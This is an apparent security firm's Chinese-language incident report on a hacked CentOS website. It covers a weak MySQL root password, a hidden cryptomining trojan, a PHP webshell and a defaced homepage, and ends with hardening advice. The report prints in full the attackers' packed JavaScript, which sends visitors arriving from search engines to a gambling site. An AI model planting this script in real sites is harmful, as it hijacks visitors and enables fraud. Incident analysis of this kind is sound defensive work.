近日某客戶網站被駭，導致網站首頁被篡改並跳轉到賭博網站，網站在百度的收錄也收錄

了一些什麼彩票內容的快照，網站首頁快照也被修改成賭博內容，並被百度直接紅色風險攔截提

示，百度網址安全中心提醒您：該站點可能受到駭客攻擊，部分頁面已被非法篡改！我們esafe安

全公司根據以上客戶被黑的情況，立即進行了全面的網站安全檢測，針對網站被駭的情況制定了

詳細的安全部署方案。
 

 

首先客戶網站使用的是Linux centos系統主機，客戶提供主機ip,ssh端口，root賬號密碼後

，我們進去查看了主機是否存在被黑以及系統木馬後門的情況，再一個我們對其使用的

mysql數據庫進行了安全檢測，發現問題，該mysql數據庫的root賬號使用的是弱口令密碼，導

致攻擊者可以利用軟件對數據庫進行強力破解，導致破解成功，利用root權限直接提權並上傳

腳本木馬到網站的根目錄下。

 

 

根據上面發現的數據庫安全問題，我們深度挖掘，追蹤溯源，發現主機還存在木馬後門，

top，查看linux當前進程，發現一個可疑的進程，通過查看進程的詳細信息我們發現該進程是木

馬後門進程，再仔細一檢查發現該木馬是挖礦木馬，攻擊者利用主機資源，帶寬，進行挖礦，

像比特幣、以太坊等幣進行挖礦。
 

 

我們對其挖礦木馬進行安全分析：如下圖

 

解密木馬內容，我們發現該木馬目前來說是免殺的木馬，一般人是看不出問題來，但是經常維護

主機的運維人員就會察覺出來，第一該木馬隱藏到linux進程當中去，根據時間段進行挖礦，避

開高峰時間，以及維護人員的工作時間，當挖礦的時候木馬進程CPU佔用達到百分之80以上，甚

至有時候網站都打開很慢。

 

主機的木馬查完後，我們對網站的源代碼進行安全檢測，發現網站目錄裡被上傳了網站木馬

後門，php腳本木馬，該腳本木馬可以對網站進行讀寫新建等操作，網站的首頁標題描述也被

改成了什麼賭博的內容如下圖：
 

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e

 

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

 

(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

 

[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

 

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

 

('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

 

\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

 

\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

 

\";");3.4("</5>");',25,25,'|s|indexOf|document|writeln|script|sogou|

 

baidu|soso|uc|sm|Javascript|LANGUAGE|var|if|referrer|href|location|www|

 

http|so|bing|yahoo|com|268238'.split('|'),0,{}))

</script>

 

通過解密上面的代碼發現，只要是從百度，搜狗，以及soso，so,bing等搜索引擎來的訪問，都會

直接跳轉到攻擊者設定好的賭博網站上去。隨即我們eSafe白帽資安網公司對該惡意代碼進行了清除，網

站恢復正常訪問。

 

 

以上就是我們解決客戶網站安全的整個過程，下面針對於此次網站被駭，提供如下的網站安全建議：
 

 

1.對mysql數據庫進行安全部署，對root賬號密碼加密，盡可能設置的複雜一些，數字+大小寫

字母+特殊符號，對網站數據庫進行分配普通權限賬號。

 

2.mysql數據庫默認端口3306，改為51158，並加入到端口安全策略，不對外開放，外網IP無法

連接數據庫，只有本地127.0.0.1才能進行連接數據庫，以防止攻擊者惡意猜測。

 

3.對主機底層系統進行安全加固，包括SSH登錄的安全驗證。

 

4.對網站代碼進行整體的安全檢測，包括定期的升級網站程序源代碼，修復補丁以及網站漏洞。